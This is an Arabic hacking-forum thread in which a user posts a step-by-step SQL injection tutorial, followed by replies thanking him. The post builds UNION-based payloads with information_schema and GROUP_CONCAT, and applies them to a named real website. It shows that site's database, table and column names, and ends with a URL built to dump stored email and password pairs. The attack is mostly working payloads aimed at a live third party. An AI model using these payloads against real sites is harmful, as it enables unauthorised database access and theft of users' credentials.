1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Hiker | المشاهدات : 687 | الردود : 12
حالة الموضوع:
مغلق
  1. Hiker <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏2 يوليو 2014
    المشاركات:
    23
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    15
    اللغة البرمجية:
    Perl
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    اليوم نتكلم عن حقن المواقع بستعلام جديد
    واضهار المعلومات المطلوبه بحقنه واحده
    يعني راح نخاطب القاعده باستعلام واحد
    ان شاء الله
    هذا الدرس يعتبر من دروس الحقن المتقدم
    نبدأ
    اولا نقوم بتوضيح تفصيلي وتبسيطي للاستعلامات

    نأتي لنبين معنى الاستعلام

    التالي
    كود PHP:
     Concat(Table_schema,0x2e,table_Name,0x3e,GROUP_CONCAT(column_name))

    Concat = امر لربط اكثر من استعلام

    Table_schema = جدول نواة القاعده


    table_Name = اسم الجدول


    GROUP_CONCAT(column_name) = امر لربط واستخراج كل مافيه اي استخراج اسماء كل العواميد الموجوده


    الاستعلام الاخر


    كود PHP:
    +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1-- 
    FROM = من

    information_schema.columns = معلومات نواة القاعده للعواميد


    WHERE table_schema=database() = اينما تجد جدول نواة القاعده التي تساوي اسم القاعده


    GROUP BY table_name LIMIT 0,1 = اعرضهم لي عن طريق اسم اول جدول


    هنا

    فسرنا الاستعلامات تفسير بلغتنه لكي يفهم الحاقن ما هذه الاستعلامات وكيف يتم التخاطب بها مع القاعده

    يعني كأنا نقول للقاعده

    DATABASE . TABLE > ALL COLUMNS

    ياقاعده استخرجيلي الجدول الاول من اسم القاعده الفلانيه واجلبيلي كل الحقول الي داخل الجدول الفلاني



    الان نأتي الى التطبيق الحي على احدى المواقع


    عندنا موقع راح انطبق عليه الاستعلام

    لاحظ هذا الموقع

    كود PHP:
    http://www.starasia.org/post.php?id=-14%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12-- 
    في عدة اعمده مصاب راح انجرب نحقن في العمود 11


    [​IMG]


    نجرب نضع استعلامنا

    يكون هذا في العمود المصاب

    كود PHP:
    Concat(Table_schema,0x2e,table_Name,0x3e,GROUP_CONCAT(column_name)) 
    ويكون الاستعلام التالي بعد الحقنه


    كود PHP:
    +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1-- 
    اي يصبح الاستعلام بهذا الشكل

    كود PHP:
    http://www.starasia.org/post.php?id=-14%20union%20select%201,2,3,4,5,6,7,8,9,10,Concat%28Table_schema,0x2e,table_Name,0x3e,GROUP_CONCAT%28column_name%29%29,12+FROM%20information_schema.columns%20WHERE%20table_schema=database%28%29%20GROUP%20BY%20table_name%20LIMIT%200,1-- 
    [​IMG]


    لاحظ لقد تم استخراج كل العواميد الموجوده داخل الجدول باستعلام واحد و نستبعد الطريقة التقليديه في الحقن مما سيسهل علينا استخراج الاعمده التي بداخل الجداول بشكل سريع


    اسم القاعده = deepakba_star
    اسم الجدول = boothbooking

    اسماء الاعمده

    كود PHP:
    boothtotal,pc2_email,pc2_designation,pc2_name,pc1_email,pc1_designation,pc1_lname,pc1_name,website,email,cell,ownership,rep1_designation,otherorganisation,bookingamount,typeofbooking,servicetax,rep3_designation,rep3_name,rep2_email,rep2_designation,rep2_name,rep1_email,fax,tel,country,companyname,Id,StAR_ref_id,paymentid,password,rep1_name,address,city,state,postcode 
    الان ناتي الى الاستعلا الاخير في استخراج بيانات الاعمده


    راح نستخدم الاستعلام التالي ونضعه في العمود المصاب مع مراعات التغير الازم لاحظ



    كود PHP:
    (select+group_concat(column_name1,0x3a,column_name2,0x3c62723e)+from+table_Name)  
    column_name1 = العمود المراد استخراج بياناته اي مثلا يوزر الادمن
    table_Name = اسم الجدول الادمن لنفرض

    اي الحقنه في الاخير راح اتكون بهذا الشكل


    كود PHP:
    http://www.starasia.org/post.php?id=-14%20union%20select%201,2,3,4,5,6,7,8,9,10,%28select+group_concat%28email,0x3a,password,0x3c62723e%29+from+boothbooking%29,12--
    اعذروني ادري طولت عليكم
    السموحه يا شباب
    واي استفسار انا حاضر
    في امان الله
     
  2. HaMaM-HaCkEr DeveloPer Plus

    الأنتساب:
    ‏22 نوفمبر 2012
    المشاركات:
    117
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    مولع القسم بالمواضيع الرائعه ُ;)ًٌُ

    ماقدرت اقيمك i:q4^:

    يجب أن تضع للبعض سمعات قبل إعطائها إلى Hiker مرة أخرى.

    معوض يالذيب ً#ٌ5oًًًُ.
     
  3. مـ☻ـجـ☻ـآهـ☻ـد <span style="background-color: #E0921B"><span styl DeveloPer Plus

    الأنتساب:
    ‏30 مارس 2012
    المشاركات:
    152
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    الإقامة:
    {ĜäŽã}
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    باركـ الله فيــك وزادك من علمه
    دائماً تتحفنا بحصرياتك و مواضيــعك الشيقةُ
     
  4. DeeF Developer

    الأنتساب:
    ‏15 نوفمبر 2012
    المشاركات:
    16
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    15
    الإقامة:
    I Q - T E A M
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    CSS
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    مبدع ومشكور على الطرح الرائع !!:{
     
  5. Hiker <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏2 يوليو 2014
    المشاركات:
    23
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    15
    اللغة البرمجية:
    Perl
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    حياكم الله منورين اي استفسار موجود
    #ٌnًo.
     
  6. Abo MalaK Developer

    الأنتساب:
    ‏15 يونيو 2012
    المشاركات:
    44
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    يعطيك العافية يا مبدع
     
  7. Ahmed Hamody ExpErt DeveloPer

    الأنتساب:
    ‏24 نوفمبر 2012
    المشاركات:
    74
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    مش هقول اني من مصر
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    تسلم ياغالي بارك الله فيك &:":
     
  8. d4rK-h4ck3r Developer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    38
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    تونس
    نظام التشغيل:
    Linux
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    عليكم السلام ورحمة الله وبركاته

    تسلم على الدرس الرائع

    درس سهل وواضح ومفهوم

    في إنتظار باقي الدروس

    دمت بحفظ الرحمن
     
  9. security alqasem موقوف لمخالفة الشروط

    الأنتساب:
    ‏26 مايو 2014
    المشاركات:
    54
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Perl
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    شكرا على الموضوع



    i:q^::{10}::{10}::{10}::{10}::{10}::{10}:i:q^:​
     
  10. ӎƦ.HmidE DeveloPer Plus

    الأنتساب:
    ‏9 يوليو 2012
    المشاركات:
    106
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    50
    الوظيفة:
    .....
    الإقامة:
    JoRdaN
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    بارك الله فيك اخي واصل
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة